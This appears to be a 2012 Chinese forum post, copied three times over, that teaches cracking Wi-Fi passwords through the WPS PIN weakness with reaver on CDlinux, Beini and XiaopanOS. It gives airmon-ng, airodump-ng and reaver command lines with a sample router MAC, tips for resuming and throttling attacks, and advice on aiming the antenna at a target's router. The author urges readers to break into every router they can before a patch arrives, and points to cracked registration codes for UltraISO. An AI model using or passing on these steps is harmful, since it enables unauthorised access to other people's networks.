少尉
- 注册时间
- 2008-5-2
- 金币
- 209 个
- 威望
- 1 个
- 荣誉
- 0 个
尚未签到
|
精解reaver用CDlinux、奶瓶、XiaopanOS-3成功PIN解码,坚持就是胜利 [复制链接]
pesticide63 pesticide63 当前离线
在线时间510 小时金币46023 元威望6 荣誉0 最后登录2012-4-12注册时间2011-4-21帖子717精华0积分47280阅读权限200UID452502 IP卡 狗仔卡
少将
少将, 积分 47280, 距离下一级还需 12720 积分TA的每日心情
奋斗
2012-3-9 20:31
签到天数: 1 天
[LV.1]初来乍到
威望6 荣誉0 金币46023 元注册时间2011-4-21积分47280帖子717串个门 加好友 打招呼 发消息 电梯直达 楼主
发表于 2012-1-14 13:41:27 |只看该作者 |倒序浏览
本帖最后由 pesticide63 于 2012-2-9 23:10 编辑
pin码破密特点:1、不需要客户端,2、有PIN码就能获得无线密码,3、八位数PIN码实际只有一万一千组随机密码,4、抓包、EWSA跑包,每个环节都有很大的不确定性。而PIN破密,只要开户WPS,破密只是个时间问题。
提醒:大家还是早点都把能pin的路由都破了!
可能马上就有安全补救方案出来了!到时候就没机会了,
时不我待、只争朝夕!
BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。
reaver使用方法、步骤:
打开超级终端 ROOt shell
如果电脑装有多个无线网卡,请先发指令
ifconfig -a
确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例
一、激活监听模式:
airmon-ng start wlan0
二、查看周边AP信息(抓包):
airodump-ng mon0
观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。
PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)
三、按Ctrl+C终止抓包
四、 抓PIN码:
reaver -i mon0 -b MAC -vv
例如:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv
1.4版可用:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v (可用一个v)
注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W!
下载reaver:
先下载cdlinux专用reaver的图形化 cdlinux专用reaver的图形化.zip (1.11 MB)
再下载图形化的 minidwep-gtk-30208-cdl(1.7 MB 支持多网卡多AP同时PIN)
将下载文件解压添加到CDlinux-0.9.6.1(或CDlinux-0.9.7)local目录内。
将显示如下图
其次是下载小胖,程序小启动快!
xiaopanOS-.iso
http://www.anywlan.com/thread-116228-1-1.html
用UltraISO (vista、win7 以管理员身份打开)打开xiaopanOS.iso
启动 - 写入硬盘映像,选择u盘、格式化 - 写入 。
UltraISO 9.5
http://xiazai.zol.com.cn/detail/6/50186.shtml[/url]
注册码网上能找到的
http://anywlan.com/bbs/thread-112141-1-1.html[/url]
此外,下载CDlinux、beini专用reaver1.3,reaver-1.3-a-cdl.tgz.zip
解压出reaver1.3.tcz拷贝到CDlinux/local文件夹下即可,驱动程序多、运行很稳定。
reaver1.3感觉比1.4更稳定些。
reaver1.4-svn-r112 for CDlinux-0.9.6.1
http://www.anywlan.com/thread-116572-1-1.html[/url]
特别提示:
只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢?
一、使用指令:
airodump-ng mon0
MB一栏下,出现 54e. (看清楚有点“.”) 是开WPS的
二、WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,
就确认此AP开了WPS、QSS。
但是,WIN7下不出现“通过按路由器按钮也可以连接”,不等于100%没开WPS。
还是 54e. 准。
AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
PIN破密对信号要求极为严格,
如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。
特别是1、6默认频道中,有较多的AP,相互干扰
因此,确定网卡放置的最佳位置、方向、角度十分重要。
快速、简易确定对方无线路由器AP方位的技巧---探寻最佳信号接收位置
http://anywlan.com/bbs/thread-94597-1-1.html[/url]
破戒过程中 ,重复同一个PIN码 或 timeou t 可随时随地按Ctrl+C终止,reaver会自动保存进度。
重复第2-4项内容,先看看AP信号强弱或是否关机,
若继续破,则再次在终端中发送:
reaver -i mon0 -b MAC -vv
这条指令下达后,会让你选y或n,选y后就继续了
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
曙光就在前头,胜利往往在 再坚持一下的努力之中。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
如何保存破密进程呢:
reave的进度表文件保存在
1.3版:
/etc/reaver/MAC地址.wpc
1.4版:
/usr/local/etc/reaver/MAC地址.wpc
用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,
下次重启动后,再手工复制到/etc/reaver/ 目录下即可。CDLINUX下可以粘贴在CDLINUX的桌面上但就是不能粘贴在 usr/local/etc/reaver里面,
解决方法:新开个窗口 输入 sudo thunar
这样打开的文件管理器,具有root权限,可以拷贝文件到任何目录了!
更多内容,回复可见........
本帖隐藏的内容
timeout时,可适当调整网卡方位,在同一PIN数值反复测试,可Ctrl+C终止破密,让路由器休息几十秒,是不错的选择,否则个别型号AP会自锁PIN连接功能。另外,
也可以给命令增加2个参数,延长PIN穷举和反馈的响应时间避免路由当机。
reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
精解reaver用CDlinux、奶瓶、XiaopanOS-3成功PIN解码,坚持就是胜利 [复制链接]
pesticide63 pesticide63 当前离线
在线时间510 小时金币46023 元威望6 荣誉0 最后登录2012-4-12注册时间2011-4-21帖子717精华0积分47280阅读权限200UID452502 IP卡 狗仔卡
少将
少将, 积分 47280, 距离下一级还需 12720 积分TA的每日心情
奋斗
2012-3-9 20:31
签到天数: 1 天
[LV.1]初来乍到
威望6 荣誉0 金币46023 元注册时间2011-4-21积分47280帖子717串个门 加好友 打招呼 发消息 电梯直达 楼主
发表于 2012-1-14 13:41:27 |只看该作者 |倒序浏览
本帖最后由 pesticide63 于 2012-2-9 23:10 编辑
pin码破密特点:1、不需要客户端,2、有PIN码就能获得无线密码,3、八位数PIN码实际只有一万一千组随机密码,4、抓包、EWSA跑包,每个环节都有很大的不确定性。而PIN破密,只要开户WPS,破密只是个时间问题。
提醒:大家还是早点都把能pin的路由都破了!
可能马上就有安全补救方案出来了!到时候就没机会了,
时不我待、只争朝夕!
BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。
reaver使用方法、步骤:
打开超级终端 ROOt shell
如果电脑装有多个无线网卡,请先发指令
ifconfig -a
确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例
一、激活监听模式:
airmon-ng start wlan0
二、查看周边AP信息(抓包):
airodump-ng mon0
观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。
PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)
三、按Ctrl+C终止抓包
四、 抓PIN码:
reaver -i mon0 -b MAC -vv
例如:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv
1.4版可用:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v (可用一个v)
注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W!
下载reaver:
先下载cdlinux专用reaver的图形化 cdlinux专用reaver的图形化.zip (1.11 MB)
再下载图形化的 minidwep-gtk-30208-cdl(1.7 MB 支持多网卡多AP同时PIN)
将下载文件解压添加到CDlinux-0.9.6.1(或CDlinux-0.9.7)local目录内。
将显示如下图
其次是下载小胖,程序小启动快!
xiaopanOS-.iso
http://www.anywlan.com/thread-116228-1-1.html
用UltraISO (vista、win7 以管理员身份打开)打开xiaopanOS.iso
启动 - 写入硬盘映像,选择u盘、格式化 - 写入 。
UltraISO 9.5
[url]http://xiazai.zol.com.cn/detail/6/50186.shtml
注册码网上能找到的
http://anywlan.com/bbs/thread-112141-1-1.html
此外,下载CDlinux、beini专用reaver1.3,reaver-1.3-a-cdl.tgz.zip
解压出reaver1.3.tcz拷贝到CDlinux/local文件夹下即可,驱动程序多、运行很稳定。
reaver1.3感觉比1.4更稳定些。
reaver1.4-svn-r112 for CDlinux-0.9.6.1
http://www.anywlan.com/thread-116572-1-1.html
特别提示:
只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢?
一、使用指令:
airodump-ng mon0
MB一栏下,出现 54e. (看清楚有点“.”) 是开WPS的
二、WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,
就确认此AP开了WPS、QSS。
但是,WIN7下不出现“通过按路由器按钮也可以连接”,不等于100%没开WPS。
还是 54e. 准。
AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
PIN破密对信号要求极为严格,
如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。
特别是1、6默认频道中,有较多的AP,相互干扰
因此,确定网卡放置的最佳位置、方向、角度十分重要。
快速、简易确定对方无线路由器AP方位的技巧---探寻最佳信号接收位置
http://anywlan.com/bbs/thread-94597-1-1.html
破戒过程中 ,重复同一个PIN码 或 timeou t 可随时随地按Ctrl+C终止,reaver会自动保存进度。
重复第2-4项内容,先看看AP信号强弱或是否关机,
若继续破,则再次在终端中发送:
reaver -i mon0 -b MAC -vv
这条指令下达后,会让你选y或n,选y后就继续了
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
曙光就在前头,胜利往往在 再坚持一下的努力之中。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
如何保存破密进程呢:
reave的进度表文件保存在
1.3版:
/etc/reaver/MAC地址.wpc
1.4版:
/usr/local/etc/reaver/MAC地址.wpc
用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,
下次重启动后,再手工复制到/etc/reaver/ 目录下即可。CDLINUX下可以粘贴在CDLINUX的桌面上但就是不能粘贴在 usr/local/etc/reaver里面,
解决方法:新开个窗口 输入 sudo thunar
这样打开的文件管理器,具有root权限,可以拷贝文件到任何目录了!
更多内容,回复可见........
本帖隐藏的内容
timeout时,可适当调整网卡方位,在同一PIN数值反复测试,可Ctrl+C终止破密,让路由器休息几十秒,是不错的选择,否则个别型号AP会自锁PIN连接功能。另外,
也可以给命令增加2个参数,延长PIN穷举和反馈的响应时间避免路由当机。
reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
精解reaver用CDlinux、奶瓶、XiaopanOS-3成功PIN解码,坚持就是胜利 [复制链接]
pesticide63 pesticide63 当前离线
在线时间510 小时金币46023 元威望6 荣誉0 最后登录2012-4-12注册时间2011-4-21帖子717精华0积分47280阅读权限200UID452502 IP卡 狗仔卡
少将
少将, 积分 47280, 距离下一级还需 12720 积分TA的每日心情
奋斗
2012-3-9 20:31
签到天数: 1 天
[LV.1]初来乍到
威望6 荣誉0 金币46023 元注册时间2011-4-21积分47280帖子717串个门 加好友 打招呼 发消息 电梯直达 楼主
发表于 2012-1-14 13:41:27 |只看该作者 |倒序浏览
本帖最后由 pesticide63 于 2012-2-9 23:10 编辑
pin码破密特点:1、不需要客户端,2、有PIN码就能获得无线密码,3、八位数PIN码实际只有一万一千组随机密码,4、抓包、EWSA跑包,每个环节都有很大的不确定性。而PIN破密,只要开户WPS,破密只是个时间问题。
提醒:大家还是早点都把能pin的路由都破了!
可能马上就有安全补救方案出来了!到时候就没机会了,
时不我待、只争朝夕!
BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。
reaver使用方法、步骤:
打开超级终端 ROOt shell
如果电脑装有多个无线网卡,请先发指令
ifconfig -a
确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例
一、激活监听模式:
airmon-ng start wlan0
二、查看周边AP信息(抓包):
airodump-ng mon0
观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。
PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)
三、按Ctrl+C终止抓包
四、 抓PIN码:
reaver -i mon0 -b MAC -vv
例如:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv
1.4版可用:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v (可用一个v)
注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W!
下载reaver:
先下载cdlinux专用reaver的图形化 cdlinux专用reaver的图形化.zip (1.11 MB)
再下载图形化的 minidwep-gtk-30208-cdl(1.7 MB 支持多网卡多AP同时PIN)
将下载文件解压添加到CDlinux-0.9.6.1(或CDlinux-0.9.7)local目录内。
将显示如下图
其次是下载小胖,程序小启动快!
xiaopanOS-.iso
http://www.anywlan.com/thread-116228-1-1.html
用UltraISO (vista、win7 以管理员身份打开)打开xiaopanOS.iso
启动 - 写入硬盘映像,选择u盘、格式化 - 写入 。
UltraISO 9.5
http://xiazai.zol.com.cn/detail/6/50186.shtml
注册码网上能找到的
[url]http://anywlan.com/bbs/thread-112141-1-1.html
此外,下载CDlinux、beini专用reaver1.3,reaver-1.3-a-cdl.tgz.zip
解压出reaver1.3.tcz拷贝到CDlinux/local文件夹下即可,驱动程序多、运行很稳定。
reaver1.3感觉比1.4更稳定些。
reaver1.4-svn-r112 for CDlinux-0.9.6.1
[url]http://www.anywlan.com/thread-116572-1-1.html
特别提示:
只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢?
一、使用指令:
airodump-ng mon0
MB一栏下,出现 54e. (看清楚有点“.”) 是开WPS的
二、WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,
就确认此AP开了WPS、QSS。
但是,WIN7下不出现“通过按路由器按钮也可以连接”,不等于100%没开WPS。
还是 54e. 准。
AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
PIN破密对信号要求极为严格,
如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。
特别是1、6默认频道中,有较多的AP,相互干扰
因此,确定网卡放置的最佳位置、方向、角度十分重要。
快速、简易确定对方无线路由器AP方位的技巧---探寻最佳信号接收位置
[url]http://anywlan.com/bbs/thread-94597-1-1.html
破戒过程中 ,重复同一个PIN码 或 timeou t 可随时随地按Ctrl+C终止,reaver会自动保存进度。
重复第2-4项内容,先看看AP信号强弱或是否关机,
若继续破,则再次在终端中发送:
reaver -i mon0 -b MAC -vv
这条指令下达后,会让你选y或n,选y后就继续了
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
曙光就在前头,胜利往往在 再坚持一下的努力之中。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
如何保存破密进程呢:
reave的进度表文件保存在
1.3版:
/etc/reaver/MAC地址.wpc
1.4版:
/usr/local/etc/reaver/MAC地址.wpc
用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,
下次重启动后,再手工复制到/etc/reaver/ 目录下即可。CDLINUX下可以粘贴在CDLINUX的桌面上但就是不能粘贴在 usr/local/etc/reaver里面,
解决方法:新开个窗口 输入 sudo thunar
这样打开的文件管理器,具有root权限,可以拷贝文件到任何目录了!
更多内容,回复可见........
本帖隐藏的内容
timeout时,可适当调整网卡方位,在同一PIN数值反复测试,可Ctrl+C终止破密,让路由器休息几十秒,是不错的选择,否则个别型号AP会自锁PIN连接功能。另外,
也可以给命令增加2个参数,延长PIN穷举和反馈的响应时间避免路由当机。
reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
|
|
[复制链接]
IP卡
狗仔卡
发表于 2012-4-16 22:35
显身卡
